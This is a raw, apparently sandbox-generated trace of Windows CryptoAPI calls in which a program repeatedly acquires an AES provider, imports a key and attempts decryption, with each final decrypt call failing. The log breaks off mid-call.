[0223.452] CryptImportKey (in: hProv=0x773200, pbData=0x27051ac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.452] CryptContextAddRef (hProv=0x773200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.452] CryptContextAddRef (hProv=0x773200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.452] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74d90) returned 1 [0223.452] CryptContextAddRef (hProv=0x773200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.452] CryptSetKeyParam (hKey=0x4b74d90, dwParam=0x4, pbData=0x270591c*=0x1, dwFlags=0x0) returned 1 [0223.452] CryptSetKeyParam (hKey=0x4b74d90, dwParam=0x1, pbData=0x27058e8, dwFlags=0x0) returned 1 [0223.452] CryptDecrypt (in: hKey=0x4b74d90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27059fc, pdwDataLen=0x18a220 | out: pbData=0x27059fc, pdwDataLen=0x18a220) returned 1 [0223.453] CryptDecrypt (in: hKey=0x4b74d90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2705a44, pdwDataLen=0x18a220 | out: pbData=0x2705a44, pdwDataLen=0x18a220) returned 0 [0223.453] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.453] CryptReleaseContext (hProv=0x773200, dwFlags=0x0) returned 1 [0223.453] CryptReleaseContext (hProv=0x773200, dwFlags=0x0) returned 1 [0223.453] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773288) returned 1 [0223.454] CryptImportKey (in: hProv=0x773288, pbData=0x2705d7c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.454] CryptContextAddRef (hProv=0x773288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.454] CryptContextAddRef (hProv=0x773288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.454] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74e10) returned 1 [0223.454] CryptContextAddRef (hProv=0x773288, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.454] CryptSetKeyParam (hKey=0x4b74e10, dwParam=0x4, pbData=0x27064ec*=0x1, dwFlags=0x0) returned 1 [0223.454] CryptSetKeyParam (hKey=0x4b74e10, dwParam=0x1, pbData=0x27064b8, dwFlags=0x0) returned 1 [0223.454] CryptDecrypt (in: hKey=0x4b74e10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27065cc, pdwDataLen=0x18a220 | out: pbData=0x27065cc, pdwDataLen=0x18a220) returned 1 [0223.454] CryptDecrypt (in: hKey=0x4b74e10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2706614, pdwDataLen=0x18a220 | out: pbData=0x2706614, pdwDataLen=0x18a220) returned 0 [0223.454] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.454] CryptReleaseContext (hProv=0x773288, dwFlags=0x0) returned 1 [0223.454] CryptReleaseContext (hProv=0x773288, dwFlags=0x0) returned 1 [0223.454] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773310) returned 1 [0223.455] CryptImportKey (in: hProv=0x773310, pbData=0x270694c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.455] CryptContextAddRef (hProv=0x773310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.455] CryptContextAddRef (hProv=0x773310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.455] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74e90) returned 1 [0223.455] CryptContextAddRef (hProv=0x773310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.455] CryptSetKeyParam (hKey=0x4b74e90, dwParam=0x4, pbData=0x27070bc*=0x1, dwFlags=0x0) returned 1 [0223.455] CryptSetKeyParam (hKey=0x4b74e90, dwParam=0x1, pbData=0x2707088, dwFlags=0x0) returned 1 [0223.455] CryptDecrypt (in: hKey=0x4b74e90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270719c, pdwDataLen=0x18a220 | out: pbData=0x270719c, pdwDataLen=0x18a220) returned 1 [0223.455] CryptDecrypt (in: hKey=0x4b74e90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27071e4, pdwDataLen=0x18a220 | out: pbData=0x27071e4, pdwDataLen=0x18a220) returned 0 [0223.456] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.456] CryptReleaseContext (hProv=0x773310, dwFlags=0x0) returned 1 [0223.456] CryptReleaseContext (hProv=0x773310, dwFlags=0x0) returned 1 [0223.456] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773398) returned 1 [0223.456] CryptImportKey (in: hProv=0x773398, pbData=0x270751c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.456] CryptContextAddRef (hProv=0x773398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.457] CryptContextAddRef (hProv=0x773398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.457] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74f10) returned 1 [0223.457] CryptContextAddRef (hProv=0x773398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.457] CryptSetKeyParam (hKey=0x4b74f10, dwParam=0x4, pbData=0x2707c8c*=0x1, dwFlags=0x0) returned 1 [0223.457] CryptSetKeyParam (hKey=0x4b74f10, dwParam=0x1, pbData=0x2707c58, dwFlags=0x0) returned 1 [0223.457] CryptDecrypt (in: hKey=0x4b74f10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2707d6c, pdwDataLen=0x18a220 | out: pbData=0x2707d6c, pdwDataLen=0x18a220) returned 1 [0223.457] CryptDecrypt (in: hKey=0x4b74f10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2707db0, pdwDataLen=0x18a220 | out: pbData=0x2707db0, pdwDataLen=0x18a220) returned 0 [0223.457] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.457] CryptReleaseContext (hProv=0x773398, dwFlags=0x0) returned 1 [0223.457] CryptReleaseContext (hProv=0x773398, dwFlags=0x0) returned 1 [0223.457] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773420) returned 1 [0223.458] CryptImportKey (in: hProv=0x773420, pbData=0x27080e4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.458] CryptContextAddRef (hProv=0x773420, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.458] CryptContextAddRef (hProv=0x773420, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.458] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b74f90) returned 1 [0223.458] CryptContextAddRef (hProv=0x773420, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.458] CryptSetKeyParam (hKey=0x4b74f90, dwParam=0x4, pbData=0x2708854*=0x1, dwFlags=0x0) returned 1 [0223.458] CryptSetKeyParam (hKey=0x4b74f90, dwParam=0x1, pbData=0x2708820, dwFlags=0x0) returned 1 [0223.458] CryptDecrypt (in: hKey=0x4b74f90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2708934, pdwDataLen=0x18a220 | out: pbData=0x2708934, pdwDataLen=0x18a220) returned 1 [0223.458] CryptDecrypt (in: hKey=0x4b74f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2708978, pdwDataLen=0x18a220 | out: pbData=0x2708978, pdwDataLen=0x18a220) returned 0 [0223.458] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.458] CryptReleaseContext (hProv=0x773420, dwFlags=0x0) returned 1 [0223.458] CryptReleaseContext (hProv=0x773420, dwFlags=0x0) returned 1 [0223.458] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7734a8) returned 1 [0223.459] CryptImportKey (in: hProv=0x7734a8, pbData=0x2708cac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.459] CryptContextAddRef (hProv=0x7734a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.459] CryptContextAddRef (hProv=0x7734a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.459] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b75010) returned 1 [0223.459] CryptContextAddRef (hProv=0x7734a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.459] CryptSetKeyParam (hKey=0x4b75010, dwParam=0x4, pbData=0x270941c*=0x1, dwFlags=0x0) returned 1 [0223.459] CryptSetKeyParam (hKey=0x4b75010, dwParam=0x1, pbData=0x27093e8, dwFlags=0x0) returned 1 [0223.459] CryptDecrypt (in: hKey=0x4b75010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27094fc, pdwDataLen=0x18a220 | out: pbData=0x27094fc, pdwDataLen=0x18a220) returned 1 [0223.460] CryptDecrypt (in: hKey=0x4b75010, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2709540, pdwDataLen=0x18a220 | out: pbData=0x2709540, pdwDataLen=0x18a220) returned 0 [0223.460] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.460] CryptReleaseContext (hProv=0x7734a8, dwFlags=0x0) returned 1 [0223.460] CryptReleaseContext (hProv=0x7734a8, dwFlags=0x0) returned 1 [0223.460] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773530) returned 1 [0223.460] CryptImportKey (in: hProv=0x773530, pbData=0x2709874, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.460] CryptContextAddRef (hProv=0x773530, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.461] CryptContextAddRef (hProv=0x773530, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.461] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b75090) returned 1 [0223.461] CryptContextAddRef (hProv=0x773530, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.461] CryptSetKeyParam (hKey=0x4b75090, dwParam=0x4, pbData=0x2709fe4*=0x1, dwFlags=0x0) returned 1 [0223.461] CryptSetKeyParam (hKey=0x4b75090, dwParam=0x1, pbData=0x2709fb0, dwFlags=0x0) returned 1 [0223.461] CryptDecrypt (in: hKey=0x4b75090, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270a0c4, pdwDataLen=0x18a220 | out: pbData=0x270a0c4, pdwDataLen=0x18a220) returned 1 [0223.461] CryptDecrypt (in: hKey=0x4b75090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270a10c, pdwDataLen=0x18a220 | out: pbData=0x270a10c, pdwDataLen=0x18a220) returned 0 [0223.461] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.461] CryptReleaseContext (hProv=0x773530, dwFlags=0x0) returned 1 [0223.461] CryptReleaseContext (hProv=0x773530, dwFlags=0x0) returned 1 [0223.461] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7735b8) returned 1 [0223.462] CryptImportKey (in: hProv=0x7735b8, pbData=0x270a444, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.462] CryptContextAddRef (hProv=0x7735b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.462] CryptContextAddRef (hProv=0x7735b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.462] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b75110) returned 1 [0223.462] CryptContextAddRef (hProv=0x7735b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.462] CryptSetKeyParam (hKey=0x4b75110, dwParam=0x4, pbData=0x270abb4*=0x1, dwFlags=0x0) returned 1 [0223.462] CryptSetKeyParam (hKey=0x4b75110, dwParam=0x1, pbData=0x270ab80, dwFlags=0x0) returned 1 [0223.462] CryptDecrypt (in: hKey=0x4b75110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270ac94, pdwDataLen=0x18a220 | out: pbData=0x270ac94, pdwDataLen=0x18a220) returned 1 [0223.462] CryptDecrypt (in: hKey=0x4b75110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270acdc, pdwDataLen=0x18a220 | out: pbData=0x270acdc, pdwDataLen=0x18a220) returned 0 [0223.462] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.462] CryptReleaseContext (hProv=0x7735b8, dwFlags=0x0) returned 1 [0223.462] CryptReleaseContext (hProv=0x7735b8, dwFlags=0x0) returned 1 [0223.462] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773640) returned 1 [0223.463] CryptImportKey (in: hProv=0x773640, pbData=0x270b014, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.463] CryptContextAddRef (hProv=0x773640, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.463] CryptContextAddRef (hProv=0x773640, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.463] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b75190) returned 1 [0223.463] CryptContextAddRef (hProv=0x773640, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.463] CryptSetKeyParam (hKey=0x4b75190, dwParam=0x4, pbData=0x270b784*=0x1, dwFlags=0x0) returned 1 [0223.463] CryptSetKeyParam (hKey=0x4b75190, dwParam=0x1, pbData=0x270b750, dwFlags=0x0) returned 1 [0223.463] CryptDecrypt (in: hKey=0x4b75190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270b864, pdwDataLen=0x18a220 | out: pbData=0x270b864, pdwDataLen=0x18a220) returned 1 [0223.463] CryptDecrypt (in: hKey=0x4b75190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270b8ac, pdwDataLen=0x18a220 | out: pbData=0x270b8ac, pdwDataLen=0x18a220) returned 0 [0223.463] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.463] CryptReleaseContext (hProv=0x773640, dwFlags=0x0) returned 1 [0223.463] CryptReleaseContext (hProv=0x773640, dwFlags=0x0) returned 1 [0223.463] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7736c8) returned 1 [0223.464] CryptImportKey (in: hProv=0x7736c8, pbData=0x270bbe4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.464] CryptContextAddRef (hProv=0x7736c8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.464] CryptContextAddRef (hProv=0x7736c8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.464] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b75210) returned 1 [0223.464] CryptContextAddRef (hProv=0x7736c8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.464] CryptSetKeyParam (hKey=0x4b75210, dwParam=0x4, pbData=0x270c354*=0x1, dwFlags=0x0) returned 1 [0223.464] CryptSetKeyParam (hKey=0x4b75210, dwParam=0x1, pbData=0x270c320, dwFlags=0x0) returned 1 [0223.464] CryptDecrypt (in: hKey=0x4b75210, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270c434, pdwDataLen=0x18a220 | out: pbData=0x270c434, pdwDataLen=0x18a220) returned 1 [0223.465] CryptDecrypt (in: hKey=0x4b75210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270c47c, pdwDataLen=0x18a220 | out: pbData=0x270c47c, pdwDataLen=0x18a220) returned 0 [0223.465] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.465] CryptReleaseContext (hProv=0x7736c8, dwFlags=0x0) returned 1 [0223.465] CryptReleaseContext (hProv=0x7736c8, dwFlags=0x0) returned 1 [0223.465] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773750) returned 1 [0223.465] CryptImportKey (in: hProv=0x773750, pbData=0x270c8c0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.465] CryptContextAddRef (hProv=0x773750, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.465] CryptContextAddRef (hProv=0x773750, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.466] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b75290) returned 1 [0223.466] CryptContextAddRef (hProv=0x773750, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.466] CryptSetKeyParam (hKey=0x4b75290, dwParam=0x4, pbData=0x270d030*=0x1, dwFlags=0x0) returned 1 [0223.466] CryptSetKeyParam (hKey=0x4b75290, dwParam=0x1, pbData=0x270cffc, dwFlags=0x0) returned 1 [0223.466] CryptDecrypt (in: hKey=0x4b75290, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270d110, pdwDataLen=0x18a220 | out: pbData=0x270d110, pdwDataLen=0x18a220) returned 1 [0223.466] CryptDecrypt (in: hKey=0x4b75290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270d158, pdwDataLen=0x18a220 | out: pbData=0x270d158, pdwDataLen=0x18a220) returned 0 [0223.466] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.466] CryptReleaseContext (hProv=0x773750, dwFlags=0x0) returned 1 [0223.466] CryptReleaseContext (hProv=0x773750, dwFlags=0x0) returned 1 [0223.466] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7737d8) returned 1 [0223.467] CryptImportKey (in: hProv=0x7737d8, pbData=0x270d490, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.467] CryptContextAddRef (hProv=0x7737d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.467] CryptContextAddRef (hProv=0x7737d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.467] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b75310) returned 1 [0223.467] CryptContextAddRef (hProv=0x7737d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.467] CryptSetKeyParam (hKey=0x4b75310, dwParam=0x4, pbData=0x270dc00*=0x1, dwFlags=0x0) returned 1 [0223.467] CryptSetKeyParam (hKey=0x4b75310, dwParam=0x1, pbData=0x270dbcc, dwFlags=0x0) returned 1 [0223.467] CryptDecrypt (in: hKey=0x4b75310, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270dce0, pdwDataLen=0x18a220 | out: pbData=0x270dce0, pdwDataLen=0x18a220) returned 1 [0223.467] CryptDecrypt (in: hKey=0x4b75310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270dd24, pdwDataLen=0x18a220 | out: pbData=0x270dd24, pdwDataLen=0x18a220) returned 0 [0223.467] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.467] CryptReleaseContext (hProv=0x7737d8, dwFlags=0x0) returned 1 [0223.467] CryptReleaseContext (hProv=0x7737d8, dwFlags=0x0) returned 1 [0223.467] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773860) returned 1 [0223.468] CryptImportKey (in: hProv=0x773860, pbData=0x270e058, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.468] CryptContextAddRef (hProv=0x773860, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.468] CryptContextAddRef (hProv=0x773860, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.468] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b80ef0) returned 1 [0223.468] CryptContextAddRef (hProv=0x773860, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.468] CryptSetKeyParam (hKey=0x4b80ef0, dwParam=0x4, pbData=0x270e7c8*=0x1, dwFlags=0x0) returned 1 [0223.468] CryptSetKeyParam (hKey=0x4b80ef0, dwParam=0x1, pbData=0x270e794, dwFlags=0x0) returned 1 [0223.468] CryptDecrypt (in: hKey=0x4b80ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270e8a8, pdwDataLen=0x18a220 | out: pbData=0x270e8a8, pdwDataLen=0x18a220) returned 1 [0223.468] CryptDecrypt (in: hKey=0x4b80ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270e8ec, pdwDataLen=0x18a220 | out: pbData=0x270e8ec, pdwDataLen=0x18a220) returned 0 [0223.468] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.468] CryptReleaseContext (hProv=0x773860, dwFlags=0x0) returned 1 [0223.468] CryptReleaseContext (hProv=0x773860, dwFlags=0x0) returned 1 [0223.468] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7738e8) returned 1 [0223.469] CryptImportKey (in: hProv=0x7738e8, pbData=0x270ec18, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.470] CryptContextAddRef (hProv=0x7738e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.470] CryptContextAddRef (hProv=0x7738e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.470] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b80f70) returned 1 [0223.470] CryptContextAddRef (hProv=0x7738e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.470] CryptSetKeyParam (hKey=0x4b80f70, dwParam=0x4, pbData=0x270f388*=0x1, dwFlags=0x0) returned 1 [0223.470] CryptSetKeyParam (hKey=0x4b80f70, dwParam=0x1, pbData=0x270f354, dwFlags=0x0) returned 1 [0223.470] CryptDecrypt (in: hKey=0x4b80f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x270f468, pdwDataLen=0x18a220 | out: pbData=0x270f468, pdwDataLen=0x18a220) returned 1 [0223.470] CryptDecrypt (in: hKey=0x4b80f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x270f4ac, pdwDataLen=0x18a220 | out: pbData=0x270f4ac, pdwDataLen=0x18a220) returned 0 [0223.470] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.470] CryptReleaseContext (hProv=0x7738e8, dwFlags=0x0) returned 1 [0223.470] CryptReleaseContext (hProv=0x7738e8, dwFlags=0x0) returned 1 [0223.470] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773970) returned 1 [0223.471] CryptImportKey (in: hProv=0x773970, pbData=0x270f7d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.471] CryptContextAddRef (hProv=0x773970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.471] CryptContextAddRef (hProv=0x773970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.471] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b80ff0) returned 1 [0223.471] CryptContextAddRef (hProv=0x773970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.471] CryptSetKeyParam (hKey=0x4b80ff0, dwParam=0x4, pbData=0x270ff48*=0x1, dwFlags=0x0) returned 1 [0223.471] CryptSetKeyParam (hKey=0x4b80ff0, dwParam=0x1, pbData=0x270ff14, dwFlags=0x0) returned 1 [0223.471] CryptDecrypt (in: hKey=0x4b80ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2710028, pdwDataLen=0x18a220 | out: pbData=0x2710028, pdwDataLen=0x18a220) returned 1 [0223.471] CryptDecrypt (in: hKey=0x4b80ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2710070, pdwDataLen=0x18a220 | out: pbData=0x2710070, pdwDataLen=0x18a220) returned 0 [0223.471] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.471] CryptReleaseContext (hProv=0x773970, dwFlags=0x0) returned 1 [0223.471] CryptReleaseContext (hProv=0x773970, dwFlags=0x0) returned 1 [0223.471] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7739f8) returned 1 [0223.472] CryptImportKey (in: hProv=0x7739f8, pbData=0x27103a8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.472] CryptContextAddRef (hProv=0x7739f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.472] CryptContextAddRef (hProv=0x7739f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.472] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81070) returned 1 [0223.472] CryptContextAddRef (hProv=0x7739f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.472] CryptSetKeyParam (hKey=0x4b81070, dwParam=0x4, pbData=0x2710b18*=0x1, dwFlags=0x0) returned 1 [0223.472] CryptSetKeyParam (hKey=0x4b81070, dwParam=0x1, pbData=0x2710ae4, dwFlags=0x0) returned 1 [0223.472] CryptDecrypt (in: hKey=0x4b81070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2710bf8, pdwDataLen=0x18a220 | out: pbData=0x2710bf8, pdwDataLen=0x18a220) returned 1 [0223.472] CryptDecrypt (in: hKey=0x4b81070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2710c40, pdwDataLen=0x18a220 | out: pbData=0x2710c40, pdwDataLen=0x18a220) returned 0 [0223.472] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.472] CryptReleaseContext (hProv=0x7739f8, dwFlags=0x0) returned 1 [0223.472] CryptReleaseContext (hProv=0x7739f8, dwFlags=0x0) returned 1 [0223.472] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773a80) returned 1 [0223.473] CryptImportKey (in: hProv=0x773a80, pbData=0x2710f80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: 